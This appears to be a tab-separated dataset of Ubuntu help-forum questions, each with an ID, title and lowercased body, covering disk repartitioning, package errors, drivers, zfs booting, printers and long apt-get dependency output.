476269	how to re-part my disk	i installed ubuntu alongside my gnome ubuntu 14.04 os ans halfed my storage . i now do n't use gnome and thus want to re-part my disk , so that the whole disk is for ubuntu . how do i do this ? ?
476270	tor browser not working	after upgrading ubuntu 13.04 to 13.10 my tor-browser stopped taking any input through keyboard . then i deleted tor-browser and when after reinstalling it frm terminal it is showing a message tht your firefox profile couldnot be loaded . it may be missing or inaccessible .
476271	issue installing squid	when i install squid using sudo apt-get install squid this message came : reading package lists ... done building dependency tree reading state information ... done package squid is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'squid ' has no installation candidate i try to upgrade after 55 % it failed : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric-backports/restricted/binary-i386/packages 404 not found [ ip : 91.189.91.14 80 ] how can i solve this ?
476272	completely make a blank hdd	i have installed windows 8 on my laptop and i want to completely `` delete '' my hdd . i want it to be blank just the way i bought it . because i want to install linux on a blank hdd . could anybody help me ? tnx .
476276	how to integrate juju for use hpcloud	kindly guide me through to configure environments.yaml file for hpcloud so that juju shall access hpcloud for deploying instances . thanks , guru
476279	ubuntu 14.04 boots fine , but video output stops at login screen	i 'm running ubuntu 14.04 on a dell r320 . i have no 3rd party drivers enabled . machine boots normally , but when the login screen loads , it flashes momentarily and disappears and the monitor says `` input not supported '' . when i was building the machine , i 've set the desktop at 1024x768 which is definitely supported by the monitor i 'm using . i 've tried modifying /etc/default/grub to set grub_gfxmode=1024x768 ( and running update-grub after ) , with no change . firstly , is there some log files i can check to try to figure out what 's going wrong ? this is new territory for me , and i 've read a bit about x.org ... should i be changing anything there ?
476284	is i/o priority propagated to child processes ?	i recently found out about ionice . if i run a script which in turn runs processes will the priorities of the child processes be equal to the parent script ? if not , is there a way to set priorities for the child processes together ? update niceness does propagate as answered on unix.se . does the i/o priority do too ?
476296	i ca n't add work areas in gnome flashback ubuntu 14.04 or make the alt-tab work	please , i have been dealing with the alttab problem for a long time . i have alreade check keyboard shortcuts in the configuration panel but it still does n't work . ( i already had this problem in ubuntu 12.04 , but since i installed 14.04 another problem came arround . i ca n't add work spaces . i tryed changing the amount of work areas by right clicking in the desktop 's miniature but it does't chenge . anyone can help me find this parameters in a file wich i may be able to edit using sudo nano or something similar ? ps : i also have problems with the backlight but that may be another issue since i had to install samsung-backlight in 12.04 but it is n't availabe for 14.04 . i just mention it in case someone knows somthing about it .
476304	logitech c920 su ubuntu 12.04 lts . how to improve fps ?	i buy c920 logitech bacause i need high resolution and high fps but when i use the camera the real fps is around 9-10 fps . i have disabled all the functions that i do n't need like autofocus and microphone , someone know is there is something more that i can do to improve fps ? thanks , c .
476306	empty tooltips in matlab	i am running matlab r2013b . under unity , the built-in editor of matlab shows empty tooltips , as seen here : under xfce the tooltips are showing up just fine . my system : ubuntu 14.04 , intel i7 4770k . the question has already been posted somewhere else ( here and here ) , but i think this is a unity-specific problem . any ideas ?
476307	logitech t650 tap to click still not registering ?	i upgraded my firmware as suggested in this reddit link , but i still ca n't seem to trigger left clicks or right clicks via tapping . its driving me crazy now as i still need to thumb press the physical click to make the touchpad somewhat usable . any thoughts on how i could diagnose what the problem is ?
476308	shortcut keys for changing input source not working in login screen	i use shift+alt shortcut to change the input source language and it works fine everywhere except the login screen , and when waking up from suspend . is this a bug or am i missing something ? i am using ubuntu 14.04 lts .
476310	booting off a zfs root in 14.04	i 've been running a debian derivative ( lmde ) on a zfs root for half a year now . it was created by cloning a regular ext4-based install with all the necessary packages onto a zfs pool , chrooting into that pool and recreating a grub menu and bootloader . the system uses an ext-3 dedicated /boot partition . i would like to do the same with ubuntu 14.04 , but have encountered several obstacles . there is no trusty zfs-grub package the default grub package does n't have zfs support built in . i found a small bug in the build system responsible for that ( report with patch created ) and built my own grub packages . the built-in zfs support is dysfunctional , it does not add the proper arguments to the kernel command line i thus installed the zol grub package i also use on my lmde system , which does give me a correct grub.cfg however , even with that correct grub.cfg , the boot process apparently does n't retrieve the bootfs parameter from the zfs pool ; instead the variable that 's supposed to receive the value remains empty . as a result , initrd tries to load the default pool ( `` rpool '' ) , which fails of course . i can however import the pool by hand , and complete the process by hand . if memory serves me well , i also had to disable apparmor , to avoid the boot process from blocking after importing the pool . am i overlooking something ? just for comparison , i installed the ubuntu 3.13 kernel on my lmde system , and that works just fine ( i.e . the identical kernel and grub binaries allow successful booting without glitches on lmde but not on ubuntu ) . edit : grub bug reports : https : //bugs.launchpad.net/ubuntu/+source/grub2/+bug/1321335 ? comments=all https : //savannah.gnu.org/bugs/index.php ? 42392
476312	qbittorrent - list directories/folders first under torrent content	i would like to list the directories under torrent contents first . is this possible ? i have checked the settings to no avail .
476313	force fsck safe ?	my ubuntu system just froze , and i was forced to run the reiusb commands . now , in windows , you can run chdsk . i 've read about `` touch /forcefsck '' , but i have also read that 's is dangerous to check a mounted filesystem . will `` touch /forcefsck '' check the disks mounted ? is `` touch /forcefsck '' safe ? will it automatically fix the errors ? where will my corrupt file go ? thanks in advance !
476315	include binary files in deb package	i need to build a deb package from mainly node.js javascript files , but it should include some binary files as well . they are listed inside debian/source/include-binaries . otherwise i get the error message dpkg-source : error : unrepresentable changes to source the command in question is : bzr builddeb -- -us -uc after adding the file include-binaries , when running bzr builddeb -- -us -uc again , now i get a different error : it says dpkg-source : error : aborting due to unexpected upstream changes , see /tmp/mailadmin_0.0-1.diff.n6m5_6 i have no idea how to get rid of this . in the next line of output it tells me dpkg-source : info : you can integrate the local changes with dpkg-source -- commit but if i run this command in the build area of my package , it gives me the unrepresentable changes to source error message again , even though debian/source/include-binaries is present in the build area as well . i am missing the way out of this ... i tried deleting all files that are produced by the build process , still no success . further details : the target directory is /opt/mailadmin . since this directory is unusual , i listed it in the file debian/mailadmin.install ( which contains one line : ) opt/mailadmin opt/ the bzr builddeb process uses this file as expected . there is no upstream tarball , because the project is new .
476319	how do i edit unity top panel	i do n't want to add apps to the unity top panel . i just want to move a shortcut to the right end of the panel . can i move the pre present shortcuts within the panel ? so i want to move the circled icon to the right
476320	printer prints half of page	the printer ( canon pixma mp190 ) prints pages successfully - very clear - but i need to wait about 5 minutes for each page to be printed . it prints normally ( fast ) about one half of page , then it stops ... the another half of page is printed very slowly . i am running 14.04 . in the previous versions ( < = 13.10 ) , the printer was working properly . what can be the issue ? the clarity ? i do n't need such a good clarity , but i do n't know how to change it . how can i solve the problem ? i have another machine running elementary isis beta ( that is based on ubuntu 14.04 , i guess ) . the printer works fine , being connected to that machine . relevant outputs : # elementary isis beta $ uname -a linux ionica-desktop 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux # the main machine , running ubuntu 14.04 , having the issue $ uname -a linux laptop 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux
476322	additional apt sources folder	i would like to define an additional sources.list.d folder just for my user ; something like ~/sources.list.d so that i sync and use these across my machines . is it possible to do something like this with apt ?
476324	how to include microphone adjustment in sound menu	when i use skype i have 2 scrollbars for the sound : how can i keep those 2 scrollbars all the time , and not only when i have skype conversations ? when i do n't talk with skype , only speaker scrollbar is visible . edit1 : here 's an output of sudo updatedb ; locate -r indicator-sound-service $ : /home/dusan/.local/share/trash/files/build/src/indicator-sound-service /home/dusan/.local/share/trash/files/indicator-sound-12.10.2+14.04.20140401/build/src/indicator-sound-service /home/dusan/.local/share/trash/files/indicator-sound-12.2.10.2+14.04.20140401/build/src/indicator-sound-service /home/dusan/.local/share/trash/files/src/indicator-sound-service /home/dusan/.local/share/trash/files/src.2/indicator-sound-service /home/dusan/.local/share/trash/files/src.3/indicator-sound-service /home/dusan/.local/share/trash/files/src.4/indicator-sound-service /usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service /usr/local/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service
476330	how can i set up the trusty desktop iso for preseeding ?	with precise , i used to create a usb stick using the so-called `` alternate '' installer dvd with my own preseed.txt , update isolinux/txt.cfg with a new menu item that would pass my preseed file on the command line , and watch as the installer happily did all the right things to create a ubuntu install on the hard drive of the machine i booted . with trusty , the 'alternate ' image has disappeared . is it still possible to preseed a trusty install , and if so , how do i get the d-i/ubiquity system to use my preseed file ?
476332	the touchpad on my thinkpad ( t420 ) no longer works in 14.04 . why ?	the fn+f8 keyboard shortcut which used to toggle between the touchpad , legendary thinkpad red pointing device button thingy in the middle of the keyboard , and both , no longer does anything apart from show up an image of the touchpad with a x to signify that the touchpad is turned off , no matter how many times i press it . there now seems no way to toggle the the touchpad on or red pointer off and i 'm stuck having to use the red button pointer only which fortunately is how i 've always had things set up . probably unrelated : bluetooth has stopped working too in 14.04 , as described in a separate question . the failing of several functions of my laptop is encouraging me to look for a different linux flavour which would be a shame as i 've used it since 8.08 and held out buying a tablet until an ubuntu one comes along .
476333	how to check the font and font-family ubuntu is using	i need to check font and font-family that is displaying on the desktop screen . how can i do this from command line .
476334	wifi hotspot to connect to android using broadcom 43xx	i 'm running ubuntu 13.10 64b on a dell inspiron n5010 . my wireless device ( found using lspci ) is broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) . i bought a new android phone and want to connect to internet by using the laptop as a wireless access point ( ad-hoc does n't work with android ) . i tried following tutorials like the one at how to setup a wi-fi hotspot ( access point mode ) ? . the relevant output from iw list was supported interface modes : * ibss * managed running sudo hostapd /path/to/conf/file gave me ( eth1 is the wireless , verified by iwconfig ) failed to create interface mon.eth1 : -95 ( operation not supported ) could not set channel for kernel driver eth1 : unable to setup interface . could not connect to kernel driver . i am able to use connectify and virtualrouter on windows , and the phone works great . how do i get an access point running on ubuntu ? i 'm open to other alternatives as well .
476335	how to stream web media content to my smart tv via dlna ?	i want to stream a cloud based media to my tv .. i 've installed dlna server on my ubuntu pc but i want to share web content without downloading it to my pc . is that possible ?
476338	can i move my ubuntu 12.04 im using now to a live usb	hey everyone im trying to move my ubuntu 12.04 to a usb and run it from there ? is this possible and will it be my copy as in the same as im using now , ive been looking and i cant find an easy answer , i know i can create a live usb but as far as i know thats a fresh install all help would be most appreciated
476339	what is dell openmanage ubuntu repository ?	what is dell openmanage ubuntu repository ? do we need to install for ubuntu ? enter link description here
476340	consistency of gtk2 toolbars with gtk3	one of the reasons why i do n't like ubuntu 's default theme ambiance is the unacceptable inconsistency between gtk2 and gtk3 toolbars as seen in libreoffice and chromium/chrome web browser . this is not the case in the greybird theme , for example , which proves that it is possible . i would appreciate if someone can help tweak this . note : a similar problem with menus ( inc. combobox menus ) has been addressed here : consistency of gtk2 menus with gtk3 the two screenshots below show how greybird and ambiance themes display applications like ( from top to bottom ) chrome , libreoffice and kkedit ( with an `` undefined '' toolbar bgcolor which is inappropriate with the icon theme to be used in the case of ambiance as opposed to consistent looks of greybird or faience ) , unlike other apps like nautilus and gedit , which i added at the bottom of the ambiance screenshot . greybird theme : ambiance theme :
476341	php5-curl on upgraded ubuntu 14.04	i have a vps with ubuntu 14.04 installed ( was ungraded from 12.04 lts ) and lamp stack . the problem i have is i ca n't install php5-curl extension as it always gives me this error message : root @ nabeel : ~ # apt-get install php5-curl php5-common reading package lists ... done building dependency tree reading state information ... done php5-common is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5-curl : depends : phpapi-20121212+lfs depends : php5-common ( = 5.5.9+dfsg-1ubuntu4 ) but 5.5.11+dfsg-2+deb.sury.org~precise+2 is to be installed e : unable to correct problems , you have held broken packages . i tried to uninstall php5 package withapt-get purge php5 & & apt-get remove -- purge and re-install php5 with same problem . any solution ?
476351	vlc bug - does not play more then once	after i updated to ubuntu 14.04 lts the vlc stopped working : it open the file and when i close it , the taskbar icon does not disappear , even when i uninstalled it - just disappeared when i reinitialised the system . and then ( i tried every way to do this ) it stopped to open any file , files that i am used to open , movie that i have already watched - so i am sure its not codec problem . after that , i found an update , by the update manager , and download it ( between them there was one for vlc ) and i also downloaded the `` ubuntu restricted extras '' to make sure it was not a codec problem . then i could watch the new episode of got , but after that , vlc opens just the audio of my downloaded videos . some one knows how to deal with it ? i am a novice ubuntu user and i love it ! until now , this is my biggest problem , and its a hell of a problem , cause i cant watch my movies ! many thanks , gabi fleury .
476355	explanation for the listed output of `` fsck ''	i just executed the fsck command to check my drive using below : sudo fsck /dev/sda2 and i got the following output : /dev/sda2 : 1735/32768000 files ( 22,9 % non-contiguous ) , 57400225/131072000 is the file system ok ? i mean , it should state clean if the filesystem is ok. am i right ?
476358	can pulseaudio be used with port audio ?	my question may not make sense and i will try to articulate it better . i want to use this command with port audio : gst-launch pulsesrc ! pulsesink . i use a program called fldigi and it is a communications program . the screenshot i have taken is of the soundcard configuration . i want sound to be able to go from an amateur radio to the computer and hear it from the computer.here is a screenshot of the fldigi configuration of the soundcard . i purchased an external soundcard , and that is why this is necessary . is it possible ? thank you again everyone for all of you help , it is greatly appreciated .
476359	how to restore the session in ubuntu	i am new to ubuntu and i am using ubuntu 12.04 ( 64 bits ) on hp pavilion dv5 dual boot with windows 7 . i have tried every thing i could to enable hibernation in ubuntu posted on the forum but nothing seems to work . i even tried to use suspend but i could n't restore as my system got hanged up on a black screen showing nothing , forcing me to hard boot the system again . now i am starting a project that has a necessity of working on ubuntu , so i need to have something that could allow me to restore my session after i shut down just like hibernate . so is there any third party tool available that could be used to save the session and whenever i switch my laptop on i could resume all the application as i left . or any other suggestion to help me in this scenario . thanks in advance .
476360	install amd catalyst for ubuntu 14.04 intel/ati hybrids graphic	my platform : ubuntu 14.04 . dell vostro 3450 , intel/ati hybrids graphic . from amd website : among system requirements is the sofware `` glibc version 2.2 or 2.3 '' must be installed . question : how to install this ? or do we need to install it ? . among packages must be installed : `` glibc , xfree86-mesa-libgl , libgcc , xfree86-libs , freetype , zlib '' . question : how to install them ? or do we need to install them ? the package libstdc++ , i installed , then got errors as below , now what do i need to do for next ? apt-get output : $ sudo apt-get install libstdc++ reading package lists ... done building dependency tree reading state information ... done note , selecting 'libstdc++6-4.7-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-pic-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.8-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-powerpc-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-arm64-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-pic-arm64-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.8-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.5-dbg ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-arm64-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.5-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-pic-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dev-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.2-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-dev-armel-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-ppc64el-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.1-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-3.3-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-pic-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-doc ' for regex 'libstdc+' note , selecting 'libstdc++5-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-pic ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++-pic-armhf-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++5-3.3-dbg ' for regex 'libstdc+' note , selecting 'libstdc++-dev-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++-dev-powerpc-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++-dev-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-4.0-dbg ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-dbg ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-pic-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-3.3-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.5-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.0-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++-dev-ppc64el-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-powerpc-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++-pic-powerpc-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-dev-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.5-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-dev-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++-dev-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.0-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-dev-arm64-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-ppc64el-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++-pic-ppc64el-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.1-dbg ' for regex 'libstdc+' note , selecting 'libstdc++6-4.1-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-3.3-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dbg ' for regex 'libstdc+' note , selecting 'libstdc++-dev-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-3.3-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'pd-libstdcpp ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-pic-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-dbg ' for regex 'libstdc+' note , selecting 'libstdc++3.0-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-pic-powerpc-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.0-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-doc ' for regex 'libstdc+' note , selecting 'libstdc++-dev-armhf-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dev-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.5-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.1-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.2-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.2-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++-pic-arm64-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.2-dbg ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.8-dbg ' for regex 'libstdc+' note , selecting 'libstdc++5-3.3-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.8-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++-dev-armel-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.8-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg ' for regex 'libstdc+' note , selecting 'libstdc++6-4.1-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-pic ' for regex 'libstdc+' note , selecting 'libstdc++-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-armhf-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-pic-armhf-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.1-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-armhf-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dev-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-pic-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++2.8-dev ' for regex 'libstdc+' note , selecting 'libstdc++5-doc ' for regex 'libstdc+' note , selecting 'libstdc++5-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.5-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-dev-powerpc-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-pic ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-dbg ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-dev-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++2.10-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-armel-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++-dev-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-pic-armel-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-armel-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.2-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-4.0-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-pic-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++5-3.3-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.0-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.5-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++-dev-arm64-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++2.9-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-pic-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-dbg ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-dev-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++5 ' for regex 'libstdc+' note , selecting 'libstdc++6 ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-dbg-ppc64el-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.0-dbg-arm64-cross ' for regex 'libstdc+' note , selecting 'libstdc++2.9-glibc2.1-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-4.1-dbg-armhf-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.7-dev-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.4-dev ' for regex 'libstdc+' note , selecting 'libstdc++6-4.2-dbg-armel-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.2-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++6-4.3-doc ' for regex 'libstdc+' note , selecting 'libstdc++6-4.6-pic ' for regex 'libstdc+' note , selecting 'libstdc++6-dev-armhf-dcv1 ' for regex 'libstdc+' note , selecting 'libstdc++6-dbg-powerpc-cross ' for regex 'libstdc+' note , selecting 'libstdc++-4.8-dev-ppc64el-cross ' instead of 'libstdc++-dev-ppc64el-cross' note , selecting 'libstdc++-4.8-dev-ppc64el-cross ' instead of 'libstdc++-dev-ppc64el-dcv1' note , selecting 'libstdc++6-arm64-cross ' instead of 'libstdc++6-arm64-dcv1' note , selecting 'libstdc++6-armhf-cross ' instead of 'libstdc++6-armhf-dcv1' note , selecting 'libstdc++6-powerpc-cross ' instead of 'libstdc++6-powerpc-dcv1' note , selecting 'libstdc++6-ppc64el-cross ' instead of 'libstdc++6-ppc64el-dcv1' note , selecting 'libstdc++-4.8-pic-arm64-cross ' instead of 'libstdc++-pic-arm64-dcv1' note , selecting 'libstdc++-4.8-pic-armhf-cross ' instead of 'libstdc++-pic-armhf-dcv1' note , selecting 'libstdc++-4.8-pic-powerpc-cross ' instead of 'libstdc++-pic-powerpc-dcv1' note , selecting 'libstdc++-4.8-pic-ppc64el-cross ' instead of 'libstdc++-pic-ppc64el-dcv1' note , selecting 'libstdc++6-4.7-dbg-armel-cross ' instead of 'libstdc++6-dbg-armel-dcv1' note , selecting 'libstdc++6-4.7-dev-armel-cross ' instead of 'libstdc++-dev-armel-cross' note , selecting 'libstdc++6-4.7-dev-armel-cross ' instead of 'libstdc++-dev-armel-dcv1' note , selecting 'libstdc++6-4.7-dev-armel-cross ' instead of 'libstdc++6-dev-armel-dcv1' note , selecting 'libstdc++6-4.7-dev-armhf-cross ' instead of 'libstdc++6-dev-armhf-dcv1' note , selecting 'libstdc++6-4.7-pic-armel-cross ' instead of 'libstdc++6-pic-armel-dcv1' note , selecting 'libstdc++6-4.7-pic-armhf-cross ' instead of 'libstdc++6-pic-armhf-dcv1' note , selecting 'libstdc++6-4.8-dbg-ppc64el-cross ' instead of 'libstdc++6-dbg-ppc64el-dcv1' note , selecting 'libstdc++6-armel-cross ' instead of 'libstdc++6-armel-dcv1' note , selecting 'libstdc++6-4.7-dev-arm64-cross ' instead of 'libstdc++6-dev-arm64-dcv1' note , selecting 'libstdc++6-4.7-dev-powerpc-cross ' instead of 'libstdc++6-dev-powerpc-dcv1' note , selecting 'libstdc++6-4.7-pic-arm64-cross ' instead of 'libstdc++6-pic-arm64-dcv1' note , selecting 'libstdc++6-4.7-pic-powerpc-cross ' instead of 'libstdc++6-pic-powerpc-dcv1' libstdc++-4.8-dev is already the newest version . libstdc++-4.8-dev set to manually installed . libstdc++6 is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libstdc++-4.8-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-doc but 4.6.4-6ubuntu2 is to be installed conflicts : libstdc++6-4.7-doc but 4.7.3-12ubuntu1 is to be installed libstdc++6-4.6-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-8ubuntu1 is to be installed libstdc++6-4.6-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-8ubuntu1 is to be installed libstdc++6-4.7-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-dbg but 4.6.4-6ubuntu2 is to be installed libstdc++6-4.7-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-doc but 4.6.4-6ubuntu2 is to be installed libstdc++6-4.8-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-dbg but 4.6.4-6ubuntu2 is to be installed conflicts : libstdc++6-4.7-dbg but 4.7.3-12ubuntu1 is to be installed libstdc++6-4.8-dbg-arm64-cross : conflicts : libstdc++6-4.7-dbg-arm64-cross but 4.7.3-1ubuntu1cross0.6 is to be installed libstdc++6-4.8-dbg-armhf-cross : conflicts : libstdc++6-4.7-dbg-armhf-cross but 4.7.3-11ubuntu1cross1.85 is to be installed libstdc++6-4.8-dbg-powerpc-cross : conflicts : libstdc++6-4.7-dbg-powerpc-cross but 4.7.3-1ubuntu1cross0.7 is to be installed e : unable to correct problems , you have held broken packages .
